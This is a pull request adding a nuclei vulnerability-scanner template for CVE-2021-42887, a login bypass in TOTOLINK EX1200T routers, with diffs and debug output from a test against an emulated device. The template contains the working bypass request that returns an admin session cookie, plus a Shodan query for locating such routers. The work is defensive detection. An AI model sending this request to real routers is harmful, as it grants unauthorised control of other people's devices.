### PR TITLE
Create CVE-2021-42887.yaml

### DIFF
--- a/cves/2021/CVE-2021-42887.yaml
+++ b/cves/2021/CVE-2021-42887.yaml
@@ -1,0 +1,36 @@
+id: CVE-2021-42887
+
+info:
+  name: TOTOLINK - Authentication Bypass
+  author: gy741
+  severity: critical
+  description: |
+    In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2021-42887
+    - https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+    cvss-score: 9.8
+    cve-id: CVE-2021-42887
+    cwe-id: CWE-287
+  tags: totolink,auth-bypass,cve,cve2021,router
+
+requests:
+  - raw:
+      - |
+        GET /formLoginAuth.htm?authCode=1&action=login HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Set-Cookie: SESSION_ID="
+        part: header
+
+      - type: status
+        status:
+          - 302
+
+# Enhanced by mp on 2022/11/06

--- a/cves/2021/CVE-2021-42887.yaml
+++ b/cves/2021/CVE-2021-42887.yaml
@@ -19,7 +19,7 @@ info:
 requests:
   - raw:
       - |
-        GET /formLoginAuth.htm?authCode=1&action=login HTTP/1.1
+        GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and

--- a/cves/2021/CVE-2021-42887.yaml
+++ b/cves/2021/CVE-2021-42887.yaml
@@ -33,7 +33,7 @@ requests:
       - type: word
         part: body_1
         words:
-          - "TOTOLINK""
+          - "TOTOLINK"
 
       - type: word
         part: header_2

--- a/cves/2021/CVE-2021-42887.yaml
+++ b/cves/2021/CVE-2021-42887.yaml
@@ -14,10 +14,16 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-42887
     cwe-id: CWE-287
+  metadata:
+    shodan-query: title:"TOTOLINK"
   tags: totolink,auth-bypass,cve,cve2021,router
 
 requests:
   - raw:
+      - |
+        GET /login.htm HTTP/1.1
+        Host: {{Hostname}}
+
       - |
         GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
         Host: {{Hostname}}
@@ -25,12 +31,15 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body_1
+        words:
+          - "TOTOLINK""
+
+      - type: word
+        part: header_2
         words:
           - "Set-Cookie: SESSION_ID="
-        part: header
 
       - type: status
         status:
           - 302
-
-# Enhanced by mp on 2022/11/06


### PR DESCRIPTION
### Template / PR Information

Hello, 

Added CVE-2021-42887

```
In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
```

- References: https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

Verified locally using the QEMU emulator.

 ```
$ nuclei -t CVE-2021-42887.yaml -u http://x.x.x.x --debug

GET /formLoginAuth.htm?authCode=1&action=login HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: gzip

[INF] [CVE-2021-42887] Dumped HTTP response for http://x.x.x.x/formLoginAuth.htm?authCode=1&action=login

HTTP/1.1 302 Found
Connection: close
Content-Length: 345
Content-Type: text/html
Date: Sun, 06 Nov 2022 07:05:26 GMT
Location: http://x.x.x.x/home.html?timestamp=1667718327
Server: lighttpd/1.4.20
Set-Cookie: SESSION_ID=2:1667718327:2; Path=/;

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>404 - Not Found</title>
 </head>
 <body>
  <h1>404 - Not Found</h1>
 </body>
</html>
[2022-11-06 16:05:27] [CVE-2021-42887] [http] [critical] http://x.x.x.x/formLoginAuth.htm?authCode=1&action=login
```

![image](https://user-images.githubusercontent.com/29292618/200158663-d5235626-2900-44c3-b7ff-20f30e94e8f5.png)

 

